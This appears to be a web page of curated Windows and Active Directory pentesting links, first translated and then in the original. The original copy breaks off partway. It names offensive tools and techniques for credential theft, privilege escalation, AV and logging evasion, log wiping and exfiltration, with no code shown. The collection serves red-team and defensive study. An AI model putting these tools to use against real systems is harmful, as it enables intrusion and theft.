Translated version
Windows Pentesting Resources:
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
From XML External Entity to NTLM Domain Hashes
Windows Privilege Escalation Guide
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows oneliners to download remote payload and execute arbitrary code
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
Passing the hash with native RDP client (mstsc.exe)
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
Escalating privileges with ACLs in Active Directory
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
Automation Framework for the Atomic Red Team
https://github.com/redcanaryco/atomic-red-team/blob/master/Automation/readme.md
Skip Cracking Responder Hashes and Relay Them
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/amp/?__twitter_impression=true
Exchange-AD-Privesc. Repository of Exchange privilege escalations to Active Directory
This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security.
https://github.com/gdedrouas/Exchange-AD-Privesc
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
Hiding Metasploit Shellcode to Evade Windows Defender
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
Unofficial Guide to Mimikatz & Command Reference
Mimikatz
Gathering AD Data with the Active Directory PowerShell Module
Detecting Hypervisor Presence on Windows 10
Domain User Enumeration Tool
https://github.com/sensepost/UserEnum/blob/master/README.md
Blue Cloud of Death: Red Teaming Azure
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
Ring +3 Malwares: Few tricks
http://www.blackstormsecurity.com/docs/BSIDES_2018_RELEASE.pdf
Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws
http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws
Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts
Microsoft's User Account Control feature, introduced in Windows Vista, has been a topic of interest to many in the security community. Since UAC was designed to force user approval for administrative actions, attackers (and red teamers) encounter UAC on nearly every engagement. As a result, bypassing this control is a task that an actor often has to overcome, despite its lack of formal designation as a security boundary. This talk highlights what UAC is, previous work by others, research methodology, and details several technical UAC bypasses developed by the author.
https://youtu.be/c8LgqtATAnE
Windows Userland Persistence Fundamentals
http://www.fuzzysecurity.com/tutorials/19.html
DLL Hijacking via URL files
https://insert-script.blogspot.com.br/2018/05/dll-hijacking-via-url-files.html
Enumerating remote access policies through GPO
https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
https://github.com/dafthack/MailSniper
DomainPasswordSpray
DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the user list from the domain.
https://github.com/dafthack/DomainPasswordSpray
5 Ways to Find Systems Running Domain Admin Processes
How to bypass GPO Policy restriction for PowerShell usage
https://github.com/p3nt4/PowerShdll
ADAPE - Active Directory Assessment and Privilege Escalation Script
https://github.com/hausec/ADAPE-Script
Kerberoasting, exploiting unpatched systems – a day in the life of a Red Teamer
http://niiconsulting.com/checkmate/2018/05/kerberoasting-exploiting-unpatched-systems-a-day-in-the-life-of-a-red-teamer/
Understanding and Evading Get-InjectedThread
https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/
PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
https://github.com/Mr-Un1k0d3r/PowerLessShell
Dumping Clear-Text Credentials
Office365 ActiveSync Username Enumeration
https://www.sec-1.com/blog/2017/office365-activesync-username-enumeration
This script will attempt to list and get TGTs for those users that have the property
'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
For those users with such configuration, a John The Ripper output will be generated so
you can send it for cracking.
https://github.com/CoreSecurity/impacket/commit/bada8a719f8ed7be4633514eea94bc768dbaf019
NBNS Spoofing
NTLMv1 Multitool
This tool modifies NTLMv1/NTLMv1-ESS/MSCHAPv2 hashes so they can be cracked with DES Mode 14000 in hashcat
https://github.com/evilmog/ntlmv1-multi/
Invoke-Phant0m
This script walks the thread stacks of the Event Log Service process (a specific svchost.exe) and identifies the Event Log threads in order to kill them. As a result the system will not be able to collect logs, while at the same time the Event Log Service will appear to be running.
https://artofpwn.com/phant0m-killing-windows-event-log.html
https://github.com/hlldz/Invoke-Phant0m
Dumping Active Directory Domain Info – with PowerUpSQL!
15 Ways to Bypass the PowerShell Execution Policy
Elevate, UAC bypass, persistence, privilege escalation, dll hijack techniques
https://github.com/rootm0s/WinPwnage
Abusing DCOM For Yet Another Lateral Movement Technique
Invoke-WMILM
This is a PoC script for various methods to achieve authenticated remote code execution via WMI, without (at least directly) using the Win32_Process class. The type of technique is determined by the "Type" parameter.
https://github.com/Cybereason/Invoke-WMILM/blob/master/README.md
[Kernel Exploitation] 7: Arbitrary Overwrite (Win7 x86)
https://www.abatchy.com/2018/01/kernel-exploitation-7
Active Directory as a C2 (Command & Control)
https://akijosberryblog.wordpress.com/2018/03/17/active-directory-as-a-c2-command-control
Bypassing Device Guard with .NET Assembly Compilation Methods
http://www.exploit-monday.com/2017/07/bypassing-device-guard-with-dotnet-methods.html
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Jumping Network Segregation with RDP
https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
PowerShell Shellcode Injection on Win 10 (v1803)
https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/
Empire Web v2 Launched, A Web Interface to PowerShell Empire.
https://github.com/interference-security/empire-web
Hidden Administrative Accounts: BloodHound to the Rescue
https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
Extracting Service Account Passwords with Kerberoasting
https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
https://github.com/quentinhardy/msdat
Powercat
Netcat: The PowerShell version.
https://github.com/besimorhino/powercat
Windows Privilege Escalation Methods for Pentesters
Getting Domain Admin with Kerberos Unconstrained Delegation
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
Scanning for Active Directory Privileges & Privileged Accounts
Automated AD and Windows test lab deployments with Invoke-ADLabDeployer
Simplifying Password Spraying
https://www.trustwave.com/Resources/SpiderLabs-Blog/Simplifying-Password-Spraying/
A Password Spraying tool for Active Directory Credentials
https://github.com/SpiderLabs/Spray
Abusing SeLoadDriverPrivilege for privilege escalation
https://www.tarlogic.com/cn/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
Exploring PowerShell AMSI and Logging Evasion
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Weaponizing .SettingContent-ms Extensions for Code Execution
https://www.trustedsec.com/2018/06/weaponizing-settingcontent
WMImplant Post-Exploitation – An Introduction
https://www.fortynorthsecurity.com/wmimplant-post-exploitation-an-introduction
PowerShell: How to get a list of all installed Software on Remote Computers
https://sid-500.com/2018/04/02/powershell-how-to-get-a-list-of-all-installed-software-on-remote-computers
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
Disabling AMSI in JScript with One Simple Trick
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
https://github.com/Kevin-Robertson/Inveigh/blob/master/README.md
A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at scale via SMB, now also with a user hunter
https://github.com/Raikia/CredNinja
PSScriptAnalyzer is a static code checker for Windows PowerShell modules and scripts. PSScriptAnalyzer checks the quality of Windows PowerShell code by running a set of rules. The rules are based on PowerShell best practices identified by the PowerShell team and the community. It generates DiagnosticResults (errors and warnings) to inform users about potential code defects and suggests possible improvements.
https://github.com/PowerShell/PSScriptAnalyzer
Bypassing SQL Server Logon Trigger Restrictions
Evil SSDP responds to SSDP queries on the network in order to phish for NTLM hashes. It creates a fake UPnP device that lures users into visiting a malicious phishing web page.
https://gitlab.com/initstring/evil-ssdp
https://twitter.com/subTee/status/1012657434702123008?s=19
Incapacitating Windows Defender
Red Team Tales 0x01: From MSSQL to RCE
https://www.tarlogic.com/cn/blog/red-team-tales-0x01
LethalHTA - A new lateral movement technique using DCOM and HTA
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
What is it that makes a Microsoft executable a Microsoft executable? An attacker's and defender's perspective
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
PowerShell script to enumerate executables with auto-elevation enabled, handy for privilege escalation.
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
Using a SCF file to Gather Hashes
A Guide to Attacking Domain Trusts
RE: Evading Autoruns PoCs on Windows 10
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
Feature, not bug: DNSAdmin to DC compromise
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
https://github.com/Kevin-Robertson/Powermad/blob/master/README.md
Elevating AD Domain Access With Write Access on the Domain NC Head
Extracting User Password Data with Mimikatz DCSync
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
Pass-the-hash attacks against NTLM-authenticated web applications
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Veil Payloads and Veil-Ordnance
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
Clear all logs on Linux/Windows servers
https://github.com/Rizer0/Log-killer
Catch Me If You Can: Bypassing Memory Scanners with Cobalt Strike and Gargoyle
https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle
PowerShell module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming and Authenticode.
https://github.com/NetSPI/PESecurity
Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)
https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
Anonymously Enumerating Azure File Resources
Weaponizing PDFs by embedding SettingContent-ms.
https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py
Persistence using GlobalFlags in Image File Execution Options – Hidden from Autoruns.exe
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe
Compromising an Azure Windows 2008 R2 SP1 VM
https://guptaashish.com/2018/07/04/compromising-a-azure-windows-2008-r2-sp1-vm
Microsoft LAPS Security & Active Directory LAPS Configuration Recon
PowerShell is definitely the "gateway drug" to C#: GhostPack is a collection of new security tools (currently C#) that step away from the scrutiny that PowerShell monitoring attracts
https://github.com/GhostPack
Pass the Hash with Kerberos
https://malicious.link/post/2018/pass-the-hash-with-kerberos/
GhostPack
https://posts.specterops.io/ghostpack-d835018c5fc4
Domain Goodness – How I Learned to LOVE AD Explorer
Another way to get to a system shell – Assistive Technology
Robber: an open source tool for finding executables prone to DLL hijacking
https://github.com/MojtabaTajik/Robber
SafetyKatz: a combination of a slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
https://github.com/GhostPack/SafetyKatz
Stored passwords found all over the place after installing Windows in a corporate network
http://blog.win-fu.com/2017/08/stored-passwords-found-all-over-place.html
Security Fun: Bloodhound, MS16-072 and GPO Discoverability
Netsh DLL Helper
http://liberty-shell.com/sec/2018/07/28/netshlep/
Post Exploitation Using WMIC (System Command)
Updated PoC Mimikatz loader for 2018
PoC: https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7
One-liner: https://gist.github.com/xillwillx/96e2c5011577d8583635ad7bf6d4fb58
Notes on Windows Privilege Escalation
http://memorycorruption.org/windows/2018/07/29/Notes-On-Windows-Privilege-Escalation.html
Domain Penetration Testing: Using BloodHound, Crackmapexec and Mimikatz to get Domain Admin
https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin
Ultimate AppLocker Bypass List: The goal of this repository is to document the most common techniques to bypass AppLocker.
https://github.com/api0cradle/UltimateAppLockerByPassList/tree/Dev
LDAP Injection cheat sheet, attack examples and protection
https://www.checkmarx.com/knowledge/knowledgebase/LDAP
PowerShell script that allows pausing/unpausing Win32/64 executables
https://github.com/besimorhino/Pause-Process
ASP.NET Resource Files (.RESX) and Deserialisation Issues
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
Exploiting XXE vulnerabilities in IIS/.NET
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
When "ASLR" Is Not Really ASLR - The Case of Incorrect Assumptions and Bad Defaults
https://insights.sei.cmu.edu/cert/2018/08/when-aslr-is-not-really-aslr---the-case-of-incorrect-assumptions-and-bad-defaults.html
Capturing NetNTLM Hashes with Office [DOT] XML Documents
https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents
pOWershell obFUsCation
Copying files via WMI and PowerShell
https://www.fortynorthsecurity.com/copying-files-via-wmi-and-powershell
Using WinRM Through Meterpreter
https://www.trustedsec.com/2017/09/using-winrm-meterpreter
TBAL: an (accidental?) DPAPI Backdoor for local users
PoC:
https://youtu.be/NIPKMSV-KTw
P0wnedShell:
PowerShell Runspace Post Exploitation Toolkit
https://github.com/Cn33liz/p0wnedShell
mimiDbg:
PowerShell oneliner to retrieve wdigest passwords from memory
https://github.com/giMini/mimiDbg
Golden Ticket attack execution against AD-integrated SSO providers
https://www.fractalindustries.com/newsroom/blog/gt-attacks-and-sso
Windows Privilege Escalation Fundamentals
http://www.fuzzysecurity.com/tutorials/16.html
UnstoppableService:
A pattern for a self-installing Windows service in C# with the unstoppable attributes.
https://github.com/malcomvetter/UnstoppableService
Driver loader for bypassing Windows x64 Driver Signature Enforcement
https://github.com/hfiref0x/TDL
Subverting Sysmon:
Application of a Formalized Security Product Evasion Methodology
Code:
https://github.com/mattifestation/BHUSA2018_Sysmon/tree/master/Code
Slides:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Slides_Subverting_Sysmon.pdf
Whitepaper:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Whitepaper_Subverting_Sysmon.pdf
PsExec implementation in C#
https://github.com/malcomvetter/CSExec
SMBetray: Backdooring and breaking signatures
https://quickbreach.io/2018/08/12/smbetray-backdooring-and-breaking-signatures
https://github.com/QuickBreach/SMBetray.git
ADRecon: Active Directory Recon, Black Hat Arsenal 2018
https://www.slideshare.net/mobile/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation
https://github.com/sense-of-security/adrecon
PS1jacker:
A tool for generating COM hijacking payloads.
https://github.com/darkw1z/Ps1jacker
DEF CON 26 (2018) – Exploiting Active Directory Administrator Insecurities
https://adsecurity.org/wp-content/uploads/2018/08/2018-DEFCON-ExploitingADAdministratorInsecurities-Metcalf.pdf
From Workstation to Domain Admin: Why Secure Administration Isn't Secure and How to Fix It
https://adsecurity.org/wp-content/uploads/2018/08/us-18-Metcalf-From-Workstation-To-Domain-Admin-Why-Secure-Administration-Isnt-Secure-Final.pdf
Tools for instrumenting Windows Defender's mpengine.dll
https://github.com/0xAlexei/WindowsDefenderTools
Art of Anti Detection 1 – Introduction to AV & Detection Techniques
RidRelay: Enumerate usernames on a domain where you have no credentials by using SMB relay with low privileges.
https://github.com/skorov/ridrelay
Remotely Enumerate Anti-Virus Configurations
https://www.fortynorthsecurity.com/remotely-enumerate-anti-virus-configurations
Juicy Potato (abusing the golden privileges)
https://decoder.cloud/2018/08/10/juicy-potato
Juicy Potato (abusing the golden privileges)
https://ohpe.github.io/juicy-potato
Hacking around HTA files
http://blog.sevagas.com/?Hacking-around-HTA-files
Koadic C3 COM Command & Control - JScript RAT
https://github.com/zerosum0x0/koadic
Phishing – Ask and ye shall receive
https://blog.fox-it.com/2018/08/14/phishing-ask-and-ye-shall-receive
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Privilege Escalation
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
Bypassing the Microsoft AD FS multi-factor authentication protocol (CVE-2018-8340):
Multi-Factor Mixup: Who Were You Again?
https://www.okta.com/security-blog/2018/08/multi-factor-authentication-microsoft-adfs-vulnerability
Reconerator: C# Targeted Attack Reconnaissance Tools
https://github.com/stufus/reconerator
DCShadow – Minimal permissions, Active Directory Deception, Shadowception and more
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
Skeleton Key attack
https://pentestlab.blog/2018/04/10/skeleton-key
Arbitrary, Unsigned Code Execution Vector in Microsoft.Workflow.Compiler.exe
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
SANS Webcast: PowerShell for PenTesting
https://www.youtube.com/watch?v=a8_DqEVFwO8
Microsoft.Workflow.Compiler.exe Mimikatz runner.
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e
List-RDP-Connections-History
Use PowerShell to list the RDP connection history of the logged-in user or of all users
https://github.com/3gstudent/List-RDP-Connections-History
A Universal Windows Bootkit
An analysis of the MBR bootkit known as "HDRoot"
http://williamshowalter.com/a-universal-windows-bootkit
Broadcast Name Resolution Poisoning / WPAD Attack Vector
https://p16.praetorian.com/blog/broadcast-name-resolution-poisoning-wpad-attack-vector
.NET Deserialization to NTLM hashes
https://www.digitalinterruption.com/single-post/2018/04/22/NET-Deserialization-to-NTLM-hashhes
Python tool to inject fake updates into unencrypted WSUS traffic
https://github.com/pdjstone/wsuspect-proxy
Remotely Modify Anti-Virus Configurations
https://www.fortynorthsecurity.com/remotely-modify-anti-virus-configurations
Making the Perfect Injector: Abusing Windows Address Sanitization and CoW
Leaking environment variables in Windows Explorer via .URL or desktop.ini files
https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html
Extracting SSH Private Keys from Windows 10 ssh-agent
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
Top five ways I got Domain Admin on your internal network before lunch (2018 edition)
https://medium.com/@adam.toscher/top-five-way-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
Operational Guidance for Offensive User DPAPI Abuse
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
Kerberoasting and SharpRoast output parsing!
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
whitelist_bypass_server
This module aims to be a platform for testing the effectiveness of endpoint application whitelisting by providing bypasses for solutions such as Software Restriction Policies and AppLocker.
https://github.com/rapid7/metasploit-framework/pull/8783
Client-side Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
Privilege Escalation & Post-Exploitation document
https://rmusser.net/docs/Privilege_Escalation_&_Post-Exploitation.html
Task Scheduler ALPC exploit (unpatched) & PoC by SandboxEscaper
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Remote NTLM relaying through meterpreter on Windows port 445
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
Microsoft.Workflow.Compiler.exe, Veil, and Cobalt Strike
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
Having Fun with ActiveX Controls in Microsoft Word
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
Invoke-AtomicTest - Automating MITRE ATT&CK with Atomic Red Team
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
AppLocker Bypass - CMSTP
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
Persistence using AdminSDHolder and SDProp
https://blog.stealthbits.com/persistence-using-adminsdholder-and-sdprop
Red Teaming Microsoft: Part 1 - Active Directory Leaks via Azure
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
Walk-through of the Mimikatz sekurlsa module
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
Windows-privesc-check - Standalone executable to check for simple privilege escalation vectors on Windows systems
https://github.com/pentestmonkey/windows-privesc-check
Understanding how DLL hijacking works
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
Playing with Relayed Credentials
https://www.coresecurity.com/blog/playing-relayed-credentials
DDE downloaders, Excel abuse, and a PowerShell backdoor
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
Detailed technical analysis of CVE-2018-8120
https://xiaodaozhi.com/exploit/156.html
PowerShell example for the Windows zero-day privilege escalation
https://github.com/OneLogicalMyth/zeroday-powershell/blob/master/README.md
You can't contain me! :: Analyzing and Exploiting an Elevation of Privilege Vulnerability in Docker for Windows
https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html
CVE-2018-8420 - Microsoft XML Core Services (MSXML) RCE via web browser PoC
https://github.com/Theropord/CVE-2018-8420
Bypassing AppLocker Custom Rules
https://0x09al.github.io/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html
Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege
How to add a module to Mimikatz?
https://littlesecurityprince.com/security/2018/03/18/ModuleMimikatz.html
Multiple Ways to Bypass UAC using Metasploit
From OSINT to Internal: Gaining Domain Admin from the Perimeter
https://www.coalfire.com/The-Coalfire-Blog/Sept-2018/From-OSINT-to-Internal-Gaining-Domain-Admin
Using Mimikatz from a JSP Shell
https://blog.securitycompass.com/whiteboard-wednesday-using-mimikatz-from-a-jsp-shell-54f8a21693cc
Poking around with 2 lsass protection options
https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a
Introducing SharpSploit: A C# Post-Exploitation Library
https://posts.specterops.io/introducing-sharpsploit-ac-post-exploitation-library-5c7be5f16c51
Faster Domain Escalation using LDAP
A Lesson in .NET Framework Versions
https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions
Command and Control Using Active Directory
L1TF (Foreshadow) VM guest-to-host memory read PoC
https://github.com/gregvish/l1tf-poc
SMB hash hijacking and user tracking in MS Outlook
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook
SharpBox is a C# tool for compressing, encrypting and exfiltrating data to DropBox using the DropBox API
https://github.com/P1CKLES/SharpBox
From Kekeo to Rubeus
https://posts.specterops.io/from-kekeo-to-rubeus-86d2ec501c14
Tokenvator: Release 2
AppLocker CLM Bypass via COM
https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com
Injdrv is a proof-of-concept Windows driver for injecting DLLs into user-mode processes using APCs
https://github.com/wbenny/injdrv
Responder and Layer 2 Pivots
https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots
PowerShell: Documenting your environment by running systeminfo on all domain computers
https://sid-500.com/2017/08/09/powershell-documenting-your-environment-by-running-systeminfo-on-all-domain-computers
The power of Backup Operators
https://decoder.cloud/2018/02/12/the-power-of-backup-operatos
Abusing Windows Library Files for Persistence
https://www.countercept.com/blog/abusing-windows-library-files-for-persistence
Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
Invoke-Confusion: .NET remote attack from PowerShell
https://homjxi0e.wordpress.com/2018/10/02/invoke-confusion-attack-of-powershell
Creating Persistence with DCShadow
https://blog.stealthbits.com/creating-persistence-with-dcshadow
Time Travel Debugging: finding Windows GDI flaws
Malicious use of Microsoft "Local Administrator Password Solution"
http://archive.hack.lu/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Goichot.pdf
Tokenvator Wiki
https://github.com/0xbadjuju/Tokenvator/wiki
ServiceFu: Remotely harvesting service account credentials
https://www.securifera.com/blog/2018/10/07/servicefu
Operating Offensively Against Sysmon
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Exploiting Regedit: Invisible Persistence and Binary Storage
https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf
PoC:
https://github.com/ewhitehats/InvisiblePersistence/tree/master/InvisibleKeys
Attacking Azure environments with PowerShell
https://youtu.be/IdORwgxDpkw
MicroBurst: A collection of scripts for assessing Microsoft Azure security
https://github.com/NetSPI/MicroBurst
Icebreaker.py: Gaining a foothold in Active Directory with one command
Dan McInerney at SaintCon
https://youtu.be/1LR5u8uKO8I
[Tool] Icebreaker:
Gets plaintext Active Directory credentials if you are on an internal network but outside the AD environment
https://github.com/DanMcInerney/icebreaker
Leveraging WSUS - Part One
https://ijustwannared.team/2018/10/15/leveraging-wsus-part-one
PowerShell payload delivery via DNS using Invoke-PowerCloud
https://how.ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud
SharpAttack: A console for performing some security assessment tasks. It leverages .NET and the Windows API to do its work (and cobbr_io's SharpSploit). It contains commands for domain enumeration, code execution and other fun stuff.
https://github.com/jaredhaight/SharpAttack
Living off the land
https://liberty-shell.com/sec/2018/10/20/living-off-the-land
Original
Windows Pentesting Resources :
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
From XML External Entity to NTLM Domain Hashes
Windows Privilege Escalation Guide
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows oneliners to download remote payload and execute arbitrary code
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
Passing the hash with native RDP client (mstsc.exe)
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
Escalating privileges with ACLs in Active Directory
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
Automation Framework for the Atomic Red Team
https://github.com/redcanaryco/atomic-red-team/blob/master/Automation/readme.md
Skip Cracking Responder Hashes and Relay Them
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/amp/?__twitter_impression=true
Exchange-AD-Privesc. Repository of Exchange privilege escalations to Active Directory
This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security.
https://github.com/gdedrouas/Exchange-AD-Privesc
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
Hiding Metasploit Shellcode to Evade Windows Defender
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
Unofficial Guide to Mimikatz & Command Reference
Mimikatz
Gathering AD Data with the Active Directory PowerShell Module
Detecting Hypervisor Presence on Windows 10
Domain user Enumeration Tool
https://github.com/sensepost/UserEnum/blob/master/README.md
Blue Cloud of Death: Red Teaming Azure
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
Ring +3 Malwares: Few tricks
http://www.blackstormsecurity.com/docs/BSIDES_2018_RELEASE.pdf
Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws
http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws
Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts
Microsoft's User Account Control feature, introduced in Windows Vista, has been a topic of interest to many in the security community. Since UAC was designed to force user approval for administrative actions, attackers (and red teamers) encounter UAC on nearly every engagement. As a result, bypassing this control is a task that an actor often has to overcome, despite its lack of formal designation as a security boundary. This talk highlights what UAC is, previous work by others, research methodology, and details several technical UAC bypasses developed by the author.
https://youtu.be/c8LgqtATAnE
Windows Userland Persistence Fundamentals
http://www.fuzzysecurity.com/tutorials/19.html
DLL Hijacking via URL files
https://insert-script.blogspot.com.br/2018/05/dll-hijacking-via-url-files.html
Enumerating remote access policies through GPO
https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
https://github.com/dafthack/MailSniper
DomainPasswordSpray
DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain.
https://github.com/dafthack/DomainPasswordSpray
5 Ways to Find Systems Running Domain Admin Processes
How to bypass GPO Policy restriction for Powershell usage
https://github.com/p3nt4/PowerShdll
ADAPE - Active Directory Assessment and Privilege Escalation Script
